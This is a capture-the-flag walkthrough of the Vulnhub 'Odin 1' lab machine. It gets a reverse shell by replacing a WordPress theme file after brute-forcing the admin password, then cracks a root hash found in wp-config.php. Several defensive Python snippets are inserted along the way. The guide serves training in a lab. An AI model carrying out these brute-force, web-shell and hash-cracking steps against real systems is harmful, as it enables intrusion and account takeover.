
Vulnhub: Odin 1 Target Machine, Detailed Test Walkthrough

Date: 2022-11-28 12:23:48

Odin 1

Author: jason_huawen

Target Host Basic Information

Name: Odin: 1

URL:

https://www.vulnhub.com/entry/odin-1,619/

Hint:

add /etc/hosts -> ip vm + odin

example: 192.168.1.1 odin

Identifying the Target Host's IP Address

┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:be:bb:0d      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.232  08:00:27:49:5a:73      1      60  PCS Systemtechnik GmbH              

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.232.

NMAP Scan

┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.232 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 21:53 EST
Nmap scan report for bogon (192.168.56.232)
Host is up (0.00027s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: vikingarmy – Just another Joomla site
|_http-generator: WordPress 5.5.3
MAC Address: 08:00:27:49:5A:73 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.51 seconds
 

The NMAP scan results show that the target host has 1 open port.

Get Access

Browsing to port 80, the source of the returned page indicates that a hosts entry for odin needs to be added.

┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ sudo vim /etc/hosts                                        
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ cat /etc/hosts                                              
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.232  odin

The returned page contains several strings that appear to be base64-encoded; decode them:

Try different encodings with the CyberChef site:

NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC
63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTU
MFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU===

This string is base32-encoded.

Decoded, it reads:

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz rockyou nice wordlist

This suggests that the rockyou wordlist may be needed during the penetration test.

SWYgeW91IGxvb2sgY2xvc2VseSwgeW91IHdvbid0IG5lZWQgaXQgaGVyZQo=

This string is base64-encoded.

Decoded, it reads:

If you look closely, you won't need it here
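
The alphabet alone does not settle which encoding a string uses, because every base32 character is also a valid base64 character. The sketch below (an added example, not from the original post) tells the two page strings apart by strict trial decoding plus a readable-text check; the name `identify_encoding` is hypothetical.

```python
import base64
import binascii

# The two strings quoted from the page source in this walkthrough.
PAGE_STRING_1 = (
    "NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC"
    "63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTU"
    "MFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU==="
)
PAGE_STRING_2 = "SWYgeW91IGxvb2sgY2xvc2VseSwgeW91IHdvbid0IG5lZWQgaXQgaGVyZQo="

# Strict decoders: each raises on characters or padding outside its alphabet.
DECODERS = {
    "base32": lambda s: base64.b32decode(s),
    "base64": lambda s: base64.b64decode(s, validate=True),
    "hex": lambda s: bytes.fromhex(s),
}


def _as_text(raw):
    """Return the decoded text if it is readable UTF-8, else None."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text.strip()
    return None


def identify_encoding(blob):
    """Try every decoder and keep only those that yield readable text."""
    compact = "".join(blob.split())  # drop line wraps copied from the page
    results = []
    for name, decode in DECODERS.items():
        try:
            raw = decode(compact)
        except (binascii.Error, ValueError):
            continue  # not valid in this encoding
        text = _as_text(raw)
        if text is not None:
            results.append((name, text))
    return results


if __name__ == "__main__":
    for blob in (PAGE_STRING_1, PAGE_STRING_2):
        print(identify_encoding(blob))
```

A short unpadded base32 string such as `MZXW6YTB` also passes strict base64 decoding, and only the readable-text check rejects that reading.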

From the page, the title says the CMS is Joomla, but the footer says it is WordPress.

┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ nikto -h http://192.168.56.232
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.232
+ Target Hostname:    192.168.56.232
+ Target Port:        80
+ Start Time:         2022-11-27 22:06:30 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://odin/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php?action=register: Wordpress registration enabled
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2022-11-27 22:07:25 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? 


Judging from the Nikto output, the CMS running on the target host is WordPress.

Next, scan with wpscan to see whether usernames and vulnerable plugins can be found:

┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ wpscan --url http://192.168.56.232 -e u,p                                                              
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.232/ [192.168.56.232]
[+] Started: Sun Nov 27 22:09:21 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.232/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] Registration is enabled: http://192.168.56.232/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.232/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.232/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.232/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.232/, Match: 'WordPress 5.5.3'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 27 22:09:23 2022
[+] Requests Done: 54
[+] Cached Requests: 11
[+] Data Sent: 12.229 KB
[+] Data Received: 320.63 KB
[+] Memory used: 211.102 MB
[+] Elapsed time: 00:00:02

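No usernames or plugins were identified. However, by WordPress convention the user who created the first post is the administrator, and the page shows that to be odin, so assume the username is odin and see whether the password can be cracked: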

┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ wpscan --url http://192.168.56.232 -U odin -P /usr/share/wordlists/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.232/ [192.168.56.232]
[+] Started: Sun Nov 27 22:10:17 2022

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
Trying odin / prettygurl Time: 00:01:38 <                                            > (9324 / 14344392)  0.06%  ETA: 41:51:47
^Cying odin / warwick Time: 00:03:55 <                                              > (22840 / 14344392)  0.15%  ETA: 41:03:15
[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.  > (22845 / 14344392)  0.15%  ETA: 41:04:05
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 27 22:14:16 2022
[+] Requests Done: 22993
[+] Cached Requests: 30
[+] Data Sent: 11.718 MB
[+] Data Received: 13.506 MB
[+] Memory used: 263.285 MB
[+] Elapsed time: 00:03:59

Scan Aborted: Canceled by User


Surprisingly, no password was cracked either. Going directly to the /wp-admin login page and entering odin returns:

Unknown username.

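This difference in responses can be used to enumerate existing usernames. Before reaching for a tool such as Burp Suite, though, check whether the common username admin exists. Trying it returns "The password you entered for the username admin is incorrect", which means we are on the right track. Then use the rockyou wordlist to crack the admin user's password: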

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ wpscan --url http://192.168.56.232 -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.56.232/ [192.168.56.232]
[+] Started: Sun Nov 27 22:14:34 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.232/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] Registration is enabled: http://192.168.56.232/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.232/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.232/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.232/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.232/, Match: 'WordPress 5.5.3'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / qwerty                                                                                                    
Trying admin / ashley Time: 00:00:00 <                                                 > (20 / 14344412)  0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: qwerty

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 27 22:14:37 2022
[+] Requests Done: 160
[+] Cached Requests: 33
[+] Data Sent: 46.632 KB
[+] Data Received: 32.735 KB
[+] Memory used: 249.203 MB
[+] Elapsed time: 00:00:03
                                              

Successfully cracked the username and password for the WordPress admin dashboard:

username: admin

password: qwerty
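
From the defender's side, the wpscan runs above appear in the web server log as a burst of POST requests to /xmlrpc.php from a single client. The following sketch (an added example, not part of the original post) counts such requests per client in a sliding window; the log lines are constructed, and the threshold, window and function names are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# WordPress endpoints that accept a username and password.
AUTH_ENDPOINTS = ("/xmlrpc.php", "/wp-login.php")


def detect_guessing(lines, threshold=20, window=timedelta(seconds=60)):
    """Map client IP -> peak number of auth POSTs inside one window,
    for clients whose peak reaches the threshold."""
    recent = defaultdict(deque)  # per-client timestamps still in the window
    peaks = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] not in AUTH_ENDPOINTS:
            continue
        # Status is ignored on purpose: a failed XML-RPC login is still
        # answered with HTTP 200, so request rate is the usable signal.
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        peaks[m["ip"]] = max(peaks[m["ip"]], len(q))
    return {ip: n for ip, n in peaks.items() if n >= threshold}


def build_sample():
    """Constructed access-log lines (not taken from the target host)."""
    base = datetime(2022, 11, 27, 22, 10, 17, tzinfo=timezone(timedelta(hours=-5)))
    fmt = '{ip} - - [{ts}] "{req} HTTP/1.1" {st} 512 "-" "{ua}"'
    stamp = lambda t: t.strftime("%d/%b/%Y:%H:%M:%S %z")
    lines = []
    for i in range(40):  # burst: two password attempts per second for 20 s
        lines.append(fmt.format(ip="192.168.56.206", ts=stamp(base + timedelta(seconds=i // 2)),
                                req="POST /xmlrpc.php", st=200, ua="scanner"))
    for i in range(3):   # an ordinary user logging in now and then
        lines.append(fmt.format(ip="192.168.56.10", ts=stamp(base + timedelta(minutes=5 * i)),
                                req="POST /wp-login.php", st=302, ua="browser"))
    lines.append(fmt.format(ip="192.168.56.10", ts=stamp(base), req="GET /", st=200, ua="browser"))
    return lines


if __name__ == "__main__":
    print(detect_guessing(build_sample()))
```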

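Log in to the WordPress admin dashboard, then see whether shell.php can be uploaded to the WordPress backend by replacing the 404.php template.

That is: Appearance -> Theme Editor -> Theme Files -> 404.php, then Update File.

From the page source: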

<link rel='stylesheet' id='twentytwenty-style-css'  href='http://odin/wp-content/themes/twentytwenty/style.css?ver=1.5' media='all' />

The 404.php page is presumably located at:

http://odin/wp-content/themes/twentytwenty/404.php

┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.232] 46286
Linux osboxes 5.4.0-26-generic #30-Ubuntu SMP Mon Apr 20 16:58:30 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 22:29:21 up 38 min,  0 users,  load average: 0.11, 0.18, 0.44
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@osboxes:/$ 

The reverse shell from the target host was successfully received on Kali Linux.

www-data@osboxes:/$ ls
ls
bin   cdrom  etc   lib    lost+found  mnt  proc  run   srv  tmp  var
boot  dev    home  lib64  media       opt  root  sbin  sys  usr

Privilege Escalation

Look carefully at the wp-config.php file (the latter part); it contains the root account's password hash:

www-data@osboxes:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'joomla' );

/** MySQL database username */
define( 'DB_USER', 'joomla' );

/** MySQL database password */
define( 'DB_PASSWORD', 'joomla' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'hJ6K`1Lh|p>fc/)&[~yFq~fyW|aIt/aN(t4D{f4q/j.R6[|CNgW{Jgz(,w+L#[3D' );
define( 'SECURE_AUTH_KEY',  '$NY`wt7VU18-FcJC/|~c*NKy*EJ,]:6jS_ShC20hpZnUhV%+0.=-=PaM_5%shx%f' );
define( 'LOGGED_IN_KEY',    'A6R.i/vfrs*.i-e[(Elb*hD}S bV;<%bjd,!${8PRhDl+a0}X:9Y4% 6CJ,]tazm' );
define( 'NONCE_KEY',        '7B01IEuF=J}ep]`k*oy]{/*L)2O=U5LVJR+YioC?|!~KGdv-b/_ |VmHF[hC: un' );
define( 'AUTH_SALT',        '7#xk&!&`({X!1nF#jkWiXu$s7<{]vrl_n:n.R!9qy%@l1rDglP&HpB)G{bPdz>mV' );
define( 'SECURE_AUTH_SALT', '$KC6{ex+{<*Q:%T:U.`=YHg>`f!:fmFb@%twt2_z=P((gdUY@HgG5Mq4=q-5e$vg' );
define( 'LOGGED_IN_SALT',   '6gs|sWkYAZ@?&8NkX:u< F=v^sCcd/CJ#YiI-H*^ OC/SBC6XBh?cRYN(;J3_?3=' );
define( 'NONCE_SALT',       'xA+mKYMD;]J@>tEi%MT1!<$|<5KBs1AX@C8E|y2WAE=NwR5{3:piVlWHr6JsK[6u' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/

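Copy the root line (including the password hash) to the local Kali Linux machine for cracking. Be careful when copying: do not use double quotes, because the shell would expand the $ sequences inside the hash.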

┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ echo 'root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::' > root_hash
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ cat root_hash 
root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::

┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ john root_hash /usr/share/wordlists/rockyou.txt

Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
jasmine          (root)     
1g 0:00:00:01 DONE 2/3 (2022-11-27 22:56) 0.9345g/s 3514p/s 3514c/s 3514C/s crystal..bigben
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                             

The root password was cracked successfully.

www-data@osboxes:/var/www/html$ su - root
su - root
Password: jasmine

root@osboxes:~# cd /root
cd /root
root@osboxes:~# ls -alh
ls -alh

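Lessons Learned

  1. Read key files carefully. wp-config.php is usually checked only for the database username and password, so the rest of the file was not read through at first and the hash was missed.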
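
The same lesson applies to whoever maintains the site: a password hash left in a comment of a web-readable file can be found by scanning the web root before an intruder reads it. The sketch below (an added example, not from the original post) searches files for crypt(3) hashes of the `$1$`, `$5$` and `$6$` schemes; the sample file and its hash are constructed, and the function names are hypothetical.

```python
import os
import re
import tempfile

# Digest length is fixed per scheme, which filters out look-alikes.
# Assumption: only these three classic crypt(3) schemes are covered.
SCHEMES = {"1": ("md5crypt", 22), "5": ("sha256crypt", 43), "6": ("sha512crypt", 86)}

CRYPT_RE = re.compile(
    r"(?:(?P<user>[a-z_][a-z0-9_-]{0,31}):)?"   # optional shadow-style "user:"
    r"\$(?P<id>[156])\$"
    r"(?:rounds=(?P<rounds>\d+)\$)?"
    r"(?P<salt>[./A-Za-z0-9]{1,16})\$"
    r"(?P<digest>[./A-Za-z0-9]+)"
)


def scan_text(text):
    """Return one finding per crypt(3) hash found in the text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in CRYPT_RE.finditer(line):
            name, digest_len = SCHEMES[m["id"]]
            if len(m["digest"]) != digest_len:
                continue
            rounds = None
            if m["id"] in "56":  # SHA-crypt uses 5000 rounds when none is given
                rounds = int(m["rounds"]) if m["rounds"] else 5000
            findings.append({"line": lineno, "scheme": name,
                             "user": m["user"], "rounds": rounds})
    return findings


def scan_tree(root, max_bytes=1_000_000):
    """Walk a directory and scan every file up to max_bytes in size."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            path = os.path.join(dirpath, fname)
            if os.path.getsize(path) > max_bytes:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                for finding in scan_text(fh.read()):
                    hits.append((os.path.relpath(path, root), finding))
    return hits


# Constructed sample: a config file with a shadow line left in a comment.
SAMPLE_CONFIG = (
    "<?php\n"
    "define( 'DB_PASSWORD', 'example' );\n"
    "$table_prefix = 'wp_';\n"
    "require_once ABSPATH . 'wp-settings.php';\n"
    "/** root:$6$constructedsalt$" + "A" * 86 + ":18600:0:99999:7:::*/\n"
)


def demo():
    """Write the sample into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "wp-config.php"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_CONFIG)
        return scan_tree(root)


if __name__ == "__main__":
    for path, finding in demo():
        print(path, finding)
```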

From: https://www.cnblogs.com/jason-huawen/p/16931847.html
